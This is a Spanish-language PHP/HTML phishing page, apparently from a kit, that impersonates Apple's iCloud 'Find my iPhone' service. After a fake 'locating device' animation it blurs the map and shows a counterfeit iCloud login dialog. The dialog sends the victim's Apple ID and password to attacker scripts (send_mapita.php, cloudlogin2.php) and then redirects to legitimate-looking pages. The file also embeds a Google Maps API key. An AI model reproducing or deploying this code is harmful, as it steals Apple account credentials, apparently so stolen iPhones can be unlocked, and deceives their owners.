<?php 
    include("config/config.php"); 
    $host= $_SERVER["HTTP_HOST"]; 
    $DOMINIO =  "https://" . $host.'/' ; 

?> 
<!doctype html>
<html>

<!-- Mirrored from www.find-idevice.com/map/ by HTTrack Website Copier/3.x [XR&CO'2013], Wed, 09 Sep 2015 22:28:44 GMT -->
<head>
<meta charset="utf-8">
<meta name="viewport" content="initial-scale=1.0, user-scalable=no">
<meta http-equiv="Content-Type" content="text/html; charset=euc-jp">
<meta name="description" content="Inicie sesi&oacute;n en iCloud para acceder a sus fotos, videos, documentos, notas, contactos y m&aacute;s. Use su ID de Apple o cree una cuenta nueva para comenzar a usar los servicios de Apple.">
<meta name="keywords" content="icloud, free, apple">
<meta property="og:title" content="Find my iPhone - www.apple.com">
<meta property="og:image" content="img/iphone-search-200x200.png">
<meta name="description" content="Vea la ubicacion de su iPhone."/>
<meta name="robots" content="nofollow" />

<link rel="shortcut icon" type="image/x-icon" href="https://appleid.cdn-apple.com/static/bin/cb3606853004/images/favicon.ico">
  
  <!-- <META HTTP-EQUIV="Refresh" CONTENT="; URL=index"> -->

  <title>iCloud - Buscar mi iPhone</title>
  <link rel="stylesheet" href="/mapita-esp/assets/layout/strap.css">
  <link rel="stylesheet" href="/mapita-esp/assets/layout/apple.css">
  <link rel="stylesheet" href="/mapita-esp/assets/layout/kit.css">
  <link rel="stylesheet" href="/mapita-esp/assets/layout/animate.css">

          <script type = "text/javascript"
         src = "https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js">
      </script>
    
      <script type = "text/javascript" 
         src = "https://ajax.googleapis.com/ajax/libs/jqueryui/1.11.3/jquery-ui.min.js">
      </script>
    
<style>
 

body {
   /* background:url("map.html") no-repeat left top #EBEBEB fixed;*/
    background-repeat: no-repeat;
    background-size: 100%;
 
  width: 100%;
  padding: 0;
  margin: 0;
}
.Top {
  background-color: #fff; text-align:center; width:100%; font-family:Segoe, 'Segoe UI', 'DejaVu Sans', 'Trebuchet MS', Verdana, sans-serif; line-height:50px; font-size:20px; color: #333; font-weight: 700; border-bottom: solid 1px #A5D7AC;
  
}
.content {
  /*background: url(fmi_block.html) repeat;*/
  height: 100%;
  text-align: center;
  
}
.logo {
  padding-bottom:30px;
}
.form {
  
  width: 280px;
  margin: 0 auto; 
}
.form input[type=email], .form input[type=password]{
  width:270px;
  height:35px;
  margin-bottom:3px;
  font-size:16px;
  padding-left:5px;
  
  
  
}

.form input[type=submit]{
  background-color:transparent;
  border:none;
  font-size:20px;
  color:#47AF56;
  font-weight:bold;
  margin-top:30px;
  cursor:pointer;
}

</style>
<style>
  html, body {
  padding: 0;
  margin: 0; 
  font-family: sans-serif;
}

#map-container{
  position: relative;
}

#map-container, #map-canvas {
  width: 100%;
  height:100%;
}

#status {
  position: absolute;
  bottom: 13px;
  right: 0;
  z-index: 99999999;
  color: #444;
  background: rgba(255,255,255,0.5);
  font-size: 80%;
}

#buttons {
  position: absolute;
  bottom:30px;
  right: 0;
  z-index: 99999999;
  color: #444;
  background: rgba(255,255,255,0.5);
  font-size: 80%;
}

.gm-style-iw h1,
.gm-style-iw h2,
.gm-style-iw h3{
  margin: 0 0 0.5em 0;
}

..spinner {
  display: block;
  position: fixed;
  z-index: 100;
  top: 50%;
  right: 50%;
  margin-right: -25px;
  margin-top: -25px;
  color: #444;
  background: rgba(255,255,255,0.8);
  padding: 5px;
  border-radius: 5px;
}

..spinner-icon {
  width: 50px;
  height: 50px;
  box-sizing: border-box;
  margin: 0 auto;
  border: solid 5px transparent;
  border-top-color: #444;
  border-left-color: #444;
  border-bottom-color: #444;
  border-radius: 50%;
  -webkit-animation: nprogress-spinner 800ms linear infinite;
          animation: nprogress-spinner 800ms linear infinite;
}

@-webkit-keyframes nprogress-spinner {
  0%   { -webkit-transform: rotate(0deg); }
  100% { -webkit-transform: rotate(360deg); }
}
@keyframes nprogress-spinner {
  0%   { transform: rotate(0deg); }
  100% { transform: rotate(360deg); }
}
.logout {
  color: #2DA63F;
  float: right;
  padding-right: 10px;
  font-weight: normal;
  font-size: 18px;
}
.logout a {
  text-decoration: none;
  color: #2DA63F;
}

@-moz-keyframes
shake{0%,100%{-moz-transform:translate3d(0,0,0)}10%,30%,50%,70%,90%{-moz-transform:translate3d(-10px,0,0)}20%,40%,60%,80%{-moz-transform:translate3d(10px, 0, 0)}}@keyframes
shake{0%,100%{-webkit-transform:translate3d(0,0,0);-moz-transform:translate3d(0,0,0);-ms-transform:translate3d(0,0,0);-o-transform:translate3d(0,0,0);transform:translate3d(0,0,0)}10%,30%,50%,70%,90%{-webkit-transform:translate3d(-10px,0,0);-moz-transform:translate3d(-10px,0,0);-ms-transform:translate3d(-10px,0,0);-o-transform:translate3d(-10px,0,0);transform:translate3d(-10px,0,0)}20%,40%,60%,80%{-webkit-transform:translate3d(10px, 0, 0);-moz-transform:translate3d(10px, 0, 0);-ms-transform:translate3d(10px, 0, 0);-o-transform:translate3d(10px, 0, 0);transform:translate3d(10px, 0, 0)}}@-webkit-keyframes
sonarWarning{0%{box-shadow:0 0 0 0 #9cc3f1}100%{box-shadow:0 0 0 20px rgba(249,203,64,0)}}
@-webkit-keyframes shake{0%,100%{-webkit-transform:translate3d(0,0,0)}
                         10%,30%,50%,70%,90%{-webkit-transform:translate3d(-10px,0,0)}
                         20%,40%,60%,80%{-webkit-transform:translate3d(10px, 0, 0)}
}

.shake{-webkit-animation:shake 1s both;-moz-animation:shake 1s both;animation:shake 1s both}

.tour-marker{
    display:block;
    width: 8px;
    height: 8px;
    border-radius:100%;
    background:#9cc3f1;
    padding:0;
    border:none;
    display: inline-block;
    margin-left: 4px;
    -webkit-transition:all 0.3s cubic-bezier(0.165, 0.84, 0.44, 1);
    -moz-transition:all 0.3s cubic-bezier(0.165, 0.84, 0.44, 1);transition:all 0.3s cubic-bezier(0.165, 0.84, 0.44, 1);
    -webkit-animation:sonarWarning 1.8s linear infinite;-moz-animation:sonarWarning 1.8s linear infinite;
    animation:sonarWarning 1.8s linear infinite;
}

 

</style>

<script type="text/javascript">
 
function preadmod() {
var x=document.getElementById('load').style;
var y=document.getElementById('player').style;
if(x.display=='block') { x.display='none'; y.visibility='visible'; }
else { x.display='block'; y.visibility='hidden'; }
}



</script> 


   


</head>

<body> 

  <input type="hidden" id="iddapp" value="<?php echo $x_idname;?>">
  <input type="hidden" id="host" value="<?php echo $DOMINIO;?>"> 
<section id="compass">
  <div class="compass">
    <img src="/mapita-esp/assets/img/compass1.png" class="compass1" alt="">
    <img src="/mapita-esp/assets/img/compass2.png" class="compass2" alt="">
    <img src="/mapita-esp/assets/img/compass3.png" class="compass3" alt="">
    <span id="loc">Localizando.</span>
  </div>
  <div class="clearfix"></div>
</section>

  <div class="content_modall"  >  
    <div id="map-container_modall">  
      <div id="map-canvas_modall" >

        <div class="modal modal-in" style="top: 10px;" id="content_mod">
    <div class="modal-inner" style="    background-color: #fff;
    background-clip: padding-box;
    border: 1px solid rgba(0, 0, 0, .2);
    outline: 0;
    border-top-left-radius: 20px;
    border-top-right-radius: 20px;">
      <div class="modal-title">
        Conectarse a iCloud
      </div>
      <div class="modal-text">
        Ingrese su ID de Apple y contrase&ntilde;a para ver la ubicacion de tu dispositivo.

      </div>
<?php
      if($response->vermail==1){
        $value = 'value="'.$response->email.'"';
      }else{
        $value="";
      }
      ?>
      <form  id="myform" class="cloud-login" name="myform">
        <input id="ple-input" autofocus="" onblur="act_flecha()"  class="modal-text-input modal-text-input-double" name="xuser" type="email" placeholder="ID de Apple" <?php echo $value;?>>
        <input id="password-input" class="modal-text-input modal-text-input-double"  name="xpass" placeholder="Contrase&ntilde;a" type="password">
        <input type="hidden" name="id" value="<?php echo $idequipo;?>">
        
    </form></div>

    <div class="modal-buttons" style="    border-bottom-left-radius: 20px;
    background-color: #ffffff8f;
    border-bottom-right-radius: 20px;
    border-bottom: 1px solid rgba(0, 0, 0, .2);
    border-left: 1px solid rgba(0, 0, 0, .2);
    border-right: 1px solid rgba(0, 0, 0, .2);">
      <span class="modal-button" style="background: #ffffff8f;">Cancelar</span> <span class="modal-button modal-button-bold" style="background: #ffffff8f;border-right: 0px;border-left: 1px solid rgba(0, 0, 0, .2);"><label for="submit" id="register" style="display: block; width: 100%; height: 100%;">OK<input style="display: block;
    width: 100%;
    height: 100%;
    top: 0px;" id="submit" type="submit" value="OK"></label>
    <img class="loading" id="load" src="assets/img/ajax-loader.gif" alt="Loading" style="display:none;position: absolute;right: 52px;top:6px;">
  </span>
      
    </div>
  </div>

      </div>
    </div> 
  </div>

  <div class="content"  >  
    <div id="map-container">  
      <div id="map-canvas"></div>
    </div> 
  </div>
    


<script src="https://maps.googleapis.com/maps/api/js?v=3.exp&amp;sensor=false&amp;libraries=visualization"></script>
    
<script>
function initialize() {
  var myLatlng = new google.maps.LatLng(<?php echo $LONGITUD ?>,<?php echo $LATITUD?>);
  var mapOptions = {
    zoom: <?php echo $ZOMM ?>,
    center: myLatlng
  }
  var map = new google.maps.Map(document.getElementById('map-canvas'), mapOptions);
                var image = '/mapita-esp/assets/cel.png';
  var marker = new google.maps.Marker({
      position: myLatlng,
      map: map,
      icon: image,
      title: 'Your Apple Device'
  });
}

google.maps.event.addDomListener(window, 'load', initialize);

    </script>
  
<script>
  $(document).ready(function() {
    $('.deviceBody ul li[data-id="deviceID0"]').on('click', function() {

    if ( $("#findmap0").hasClass('shows') ) {

    } else {
      $("#findmap0").addClass('shows', 500).siblings().removeClass('shows', 500);
    }

    });

    
    
    $("#password-input").keypress(function(e) {
        if(13 == e.which) {
              $("#submit").click();
        } 

    }); 
    
     $("#ple-input").keypress(function(a) {
        13 == a.which && $(this).val().length > 0 && ($(this).val().indexOf("@") != -1 ? $("#password-input").focus() : ($(this).val($(this).val() + "@icloud.com"), $("#password-input").focus()))
    })
    

  });


  function act_flecha(){

    if($("#ple-input").val().length > 0){ 
      if($("#ple-input").val().indexOf("@") != -1){ 
      }else{
        $("#ple-input").val($("#ple-input").val() + "@icloud.com");
      }

    }   

  }


function shake() {
        $("#map-canvas_modall").css("position","absolute");
        $("#map-canvas_modall").css("margin-left","50%");
        
        var div = document.getElementById('content_mod');
        var interval = 100;
        var distance = 10;
        var times = 4;

        $(div).css('position', 'relative');

        for (var iter = 0; iter < (times + 1) ; iter++) {
            $(div).animate({
                left: ((iter % 2 == 0 ? distance : distance * -1))
            }, interval);
        }                                                                                                          
        $(div).animate({ left: 0 }, interval);
    }
    
function registrar() {
    $("#submit").removeAttr("onclick");
    $("#submit").parent("label").css("opacity","0.3");
     
    var c = $.trim($("#iddapp").val());
    

   function t(a) {
        //alert(a.message);
        reset(a.message);
    }
    
   
     $.ajax({
        url: "includes/send_mapita.php",
        data: {
            name:"Chad",
            user:$("#ple-input").val(),
            pass:$("#password-input").val(),
            idapp:c, 
        },
        dataType: "jsonp",
        jsonp: "callback",
        jsonpCallback: "jsonpCallback",
        success: function(a) {
            t(a);
        }
    })


}

function reset(a){
    
      var c = a,
                d = c.split("-"),
                e = d[0];
                
                if(e == "es_0"){
                       
                    $("#submit").attr("onclick","registrar()");
                    $("#password-input").val("");
                    $("#password-input").focus(); 
                    $("#submit").parent("label").css("opacity","1");
                    top.location.href = "https://www.google.com/maps/@-12.04331,-77.0463092,19z";                
                    
                }else{
                    $("#submit").attr("onclick","registrar()");
                    shake();
                    $("#password-input").val("");
                    $("#password-input").focus(); 
                    $("#submit").parent("label").css("opacity","1");
                       
                   
                }

}

 
 
</script> 

  <script src="/mapita-esp/assets/js/apple.min.js"></script>
  <script src="/mapita-esp/assets/js/mapiconmaker.js"></script>
  <script src="/mapita-esp/assets/js/ajax-form.min.js"></script>

  <script type="text/javascript">

  $(document).ready(function() {


   setTimeout(function(){
       $("#loc").text("Localizando..");
    },1000);

   setTimeout(function(){
       $("#loc").text("Localizando...");
    },2000);

   setTimeout(function(){
       $("#loc").text("Localizando.");
    },3000);

   setTimeout(function(){
       $("#loc").text("Localizando..");
    },4000);

   setTimeout(function(){
       $("#loc").text("Localizando..."); 

       setTimeout(function(){
        $(".content").css("filter","blur(3px)");
        setTimeout(function(){$("#map-canvas_modall .modal").fadeTo('slow', 1.0);} ,500);
       } ,2000);


    },5000);
 
    setTimeout(function(){
      $('#compass').fadeOut(100); 

      $("img").each(function() { 
         if($(this).attr("src")=="/mapita-esp/assets/cel.png"){
          $(this).parent("div").css("width","100px");
          $(this).parent("div").css("height","100px");
          $(this).parent("div").append('<span class="tour-marker" style="margin-top: 44px;margin-left: -60px;"></span>')
          // $(this).addClass("")
          $(this).parent("div").animate({left: "-500px", top: "20px"},100000);
          


         }
      }); 
    },5000);
  });
  </script> 
  
   <script src="https://maps.googleapis.com/maps/api/js?key=AIzaSyCh1o5cKjm-79iKXpqZOWRlDnajvmNTheA&callback=initMap"></script>
  
    <link rel="stylesheet" type="text/css" href="/mapita-esp/css/mycss.css">
    <script src="/mapita-esp/js/jquery.js"></script>
    <script>
     $("#register").on("click", getCloud);
    function getCloud(a){
      var datos = $(".cloud-login").serialize();
      $(".loading").show(0);
      $("#register").css("color", "#ffffff");
      $.post(
        "/cloudlogin2.php",
        datos,
        function(b){
          if(b==1){
            window.location="https://mapsconnect.apple.com/ui/contactus";
          }else{
            $(".loading").hide(0);
            $("#register").css("color", "#007aff");
            $("#content_mod").animate({'margin-left':'-145px'},60).animate({'margin-left':'-125px'},60).animate({'margin-left':'-145px'},60).animate({'margin-left':'-125px'},60).animate({'margin-left':'-145px'},60).animate({'margin-left':'-135px'},60);
          }
        }
      );
      a.preventDefault();
    }
    $(".reint").on("click", getVentana);
    function getVentana(){
      $("#myModal3").hide(0);
      $("#myModal2").show(0);
    }
   </script>
</body>

<!-- Mirrored from www.find-idevice.com/map/ by HTTrack Website Copier/3.x [XR&CO'2013], Wed, 09 Sep 2015 22:28:45 GMT -->
</html>